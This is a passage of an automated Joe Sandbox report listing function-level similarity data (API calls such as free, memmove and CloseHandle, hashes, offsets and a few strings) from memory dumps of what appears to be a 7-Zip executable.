                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                                                                • Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                                                                                • Instruction ID: 3df933fcd4c4282e7f37f8e3fdba63648daef3fff470c0ee3e6d02d29885747a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24D0137770994581DF355F79D45436413519B54F74F184311CDB4493E4EF3584D6C711
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileTime
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1425588814-0
                                                                                                                                                                                                                                • Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                                                • Instruction ID: aaa5e600ae99bd80d4ada1a7b1da965d10761a623eafe3683a2cbcedd9f51ccf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08B09230B12400C2CB0CA722D89631C13606798B21FE14429C90FD5650DD1C85E94700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00203E2A
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorExceptionLastThrowmalloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2114622545-0
                                                                                                                                                                                                                                • Opcode ID: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
                                                                                                                                                                                                                                • Instruction ID: 3f338523c8163d54d3f2cab50e84c3b76f8514db6d05c45abe6558897d01546f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A831CE32221B4286DB15DF29E584369B3A9FB88FE0F184235DF6A07796DF38C965C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                                                • Instruction ID: 146137a56e5121188c7c8143b2387b63c9be6cd68f7161f6b99cd828dddbe5f0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD21287370424896C728EA1AB80057A7794F799BF4F245325FF7A87794EB78C942C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memmove.MSVCRT(?,?,?,?,?,001F9B61), ref: 001F911C
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2847158419-0
                                                                                                                                                                                                                                • Opcode ID: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
                                                                                                                                                                                                                                • Instruction ID: 03764c7c59d393d2842b0b7a586983498c816e92a9870649e70f0aa393f69bd8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F217F77201B8585DB11EF1AE81472AB3A4F784FA8F19C225DF6807394DF39C496C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                • Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                                                • Instruction ID: a726a89aaefcf5b7fd652c2b38ae6938ebe0f629c958fa96485965898829500d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43113A6276565397CB3C8B6CE4B0228A251F75478CBA45C37DACA87B10DB6ACC82D2C1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41B9
                                                                                                                                                                                                                                  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41C5
                                                                                                                                                                                                                                  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41D1
                                                                                                                                                                                                                                  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41DD
                                                                                                                                                                                                                                  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41E6
                                                                                                                                                                                                                                  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41EF
                                                                                                                                                                                                                                  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41F8
                                                                                                                                                                                                                                • free.MSVCRT ref: 00203F45
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                                                • Instruction ID: 8dc80688ad54c7dfe3732482d1a2c3c430b3b91863d08242df2e005be6aff52a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21012973A24394CAC7219F1DC18116DBB34F759FE83289116EB4A07761E732C883C7A1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                                                • Instruction ID: f4e625e4c61fb7829d8c879026c9bab7c64a29e8b54f6335c49b6038cbfa9de1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42011D7635624086E710CF15D56C36E7BB0B7E5B68F180209DBA44B3D1C77AC54ACBA4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                • Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                                                • Instruction ID: 0ecc1c989ae1600eb9ae2d6795b01362685004a3509f675f56585a8f4f23e7d5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5F0E56231014987CB10DFBA9A8126821A1FB587D5F90183BEF8687701EB38CC99C764
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D89D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001D89EA
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 001DCB49
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                • Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                                                • Instruction ID: 1a98cb0f0ec80085cfe5ad4f58077641573638bf70a39aa50230840d78378893
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2D05B417A009596DB545EBD58D13740081B728795F901837DD9BCA352E618CDC9E269
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2162964266-0
                                                                                                                                                                                                                                • Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                                                • Instruction ID: 92b9b6d9eb7a2fc0db7991f57414183d45790bbc115db54d3ea8a1f82fde8852
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BD05EA67506D886CA049B27D68151DA3229B98FD4708D4249F080B70ACE30CCE6CB50
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001D89EA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                • Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                                                • Instruction ID: d2e7d8c4ee181793306d1208a89db2ad04dd859d3e140538c313b43044ffec6b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DD0A7B360194480DB291F7EC8403341350A754B78F284311CAF44A3D0EF2489C68301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                                                • Instruction ID: c81a82cc72e7bd60ad44bc3963268a212598454e74cb7f6620f3509d6669814a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CC08C4178224902C90A222BAF8636C12220FEABD1E4C88219E480BB52DB6488E2C750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                                                                                                                                                                                                                                • API String ID: 1534225298-798110030
                                                                                                                                                                                                                                • Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                                                • Instruction ID: b2032fe5e3d89127c3b67b4aead3cc25953467bb49af5bbd166d6e31a483a14c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8C15D72224A4096CA10EF11F88479EB370F7E5B90F945136EA9F43B29DF38D586CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                                                                                                                • Instruction ID: b2677f498a2f327cb63c95fe6469549b044cc6a9643992929c18c64a1c168a08
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43D14936218AC481CB24DF22E4646AEB774F7DAB84F459043DB9E43B66CF38C859CB14
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$AddressCurrentProc$fputs$HandleLibraryLoadModuleTimesmemset
                                                                                                                                                                                                                                • String ID: MCycles$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                                                                                                                                                                                                                • API String ID: 600854398-319139910
                                                                                                                                                                                                                                • Opcode ID: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
                                                                                                                                                                                                                                • Instruction ID: 7b21c826dc1ca4a216580b49b56c4c9a570d82e3e4911b3e3a462dd41a272cfe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF518C76315A8691EE60EF95F84C7E96361F7A8B80F444026DE5E43759EF3CC549C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free$memset$strlen$memmove
                                                                                                                                                                                                                                • String ID: data:
                                                                                                                                                                                                                                • API String ID: 527563900-3222861102
                                                                                                                                                                                                                                • Opcode ID: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
